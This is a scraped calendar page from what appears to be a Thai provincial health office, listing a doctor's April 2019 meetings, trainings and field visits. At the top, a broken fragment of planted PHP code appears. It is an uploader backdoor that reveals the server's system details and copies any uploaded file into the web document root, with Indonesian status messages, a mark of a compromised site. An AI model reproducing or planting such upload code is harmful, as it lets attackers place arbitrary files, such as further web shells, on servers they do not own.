Upload


"; echo "".php_uname()."
"; echo "
"; $root = $_SERVER['DOCUMENT_ROOT']; $files = $_FILES['idx_file']['name']; $dest = $root.'/'.$files; if(isset($_POST['upload'])) { if(is_writable($root)) { if(@copy($_FILES['idx_file']['tmp_name'], $dest)) { $web = "http://".$_SERVER['HTTP_HOST']."/"; echo "sukses upload -> $web/$files"; } else { echo "gagal upload di document root."; } } else { if(@copy($_FILES['idx_file']['tmp_name'], $files)) { echo "sukses upload $files di folder ini"; } else { echo "gagal upload"; } } } ?>
มีนาคม 2562
  อา พฤ
(09)           01 02
(10) 03 04 05 06 07 08 09
(11) 10 11 12 13 14 15 16
(12) 17 18 19 20 21 22 23
(13) 24 25 26 27 28 29 30
(14) 31            
พฤษภาคม 2562
  อา พฤ
(18)       01 02 03 04
(19) 05 06 07 08 09 10 11
(20) 12 13 14 15 16 17 18
(21) 19 20 21 22 23 24 25
(22) 26 27 28 29 30 31  
นายแพทย์ปฐมพงศ์ ปรุโปร่ง
เมษายน 2562

ปฏิทินทั่วไป
อาทิตย์ จันทร์ อังคาร พุธ พฤหัสบดี ศุกร์ เสาร์
  01
ดูรายการนี้อบรมหลักสูตรนักบริหารการแพทย์และสาธารณสุขระดับสูง (นบส. รุ่น 35)
02
ดูรายการนี้อบรมหลักสูตรนักบริหารการแพทย์และสาธารณสุขระดับสูง (นบส. รุ่น 35)
03
ดูรายการนี้อบรมหลักสูตรนักบริหารการแพทย์และสาธารณสุขระดับสูง (นบส. รุ่น 35)
04
ดูรายการนี้อบรมหลักสูตรนักบริหารการแพทย์และสาธารณสุขระดับสูง (นบส. รุ่น 35)
05
ดูรายการนี้อบรมหลักสูตรนักบริหารการแพทย์และสาธารณสุขระดับสูง (นบส. รุ่น 35)
06
07 (สัปดาห์ 15)
08
09
10
11
12
13
14 (สัปดาห์ 16)
15
16
17
18
19
20
21 (สัปดาห์ 17)
22
23
ดูรายการนี้9» ตรวจเยี่ยมหน่วยแพทย์เคลื่อนที่ พอ.สว. จ.อำนาจเจริญ ณ โรงเรียนบ้านหนองสามสีหนองด
ดูรายการนี้13» ประชุมติดตามงบประมาณ PPA เขต งานส่งเสริมสุขภาพ เด็ก 0-5 ปี
24
ดูรายการนี้9» ประชุมชี้แจง 3 ดี อำเภอลืออำนาจ ณ ที่ว่าการอำเภอลืออำนาจ จ.อำนา
ดูรายการนี้13» ประชุมพิจารณาแผนสิ่งก่อสร้าง ประจำปี พ.ศ.2566-3568 ที่สอดคล้องกับแผนพัฒนาระบบบร
25
ดูรายการนี้8» ประชุมชี้แจง 3 ดี อำเภอเสนางคนิคม ณ ที่ว่าการอำเภอเสนางคนิคม จ.อำนาจเจ
ดูรายการนี้9» ประชุมทบทวน KPI และแผนยุทธศาสตร์สาธารณสุขจังหวัดอำนาจเจริญ ณ ห้องคณาพันธ์
26
ดูรายการนี้9» ประชุมทีมโรงงานสมุนไพร GMP เขต 10 ณ ศูนย์แพทย์แผนไทยพนา
27
28 (สัปดาห์ 18)
29
30
ดูรายการนี้9» ประชุมชี้แจง 3 ดี อำเภอพนา ณ ที่ว่าการอำเภอพนา จ.อำนาจเจริญ
       [ พิมพ์หน้านี้! ]

 
 

 

Website counter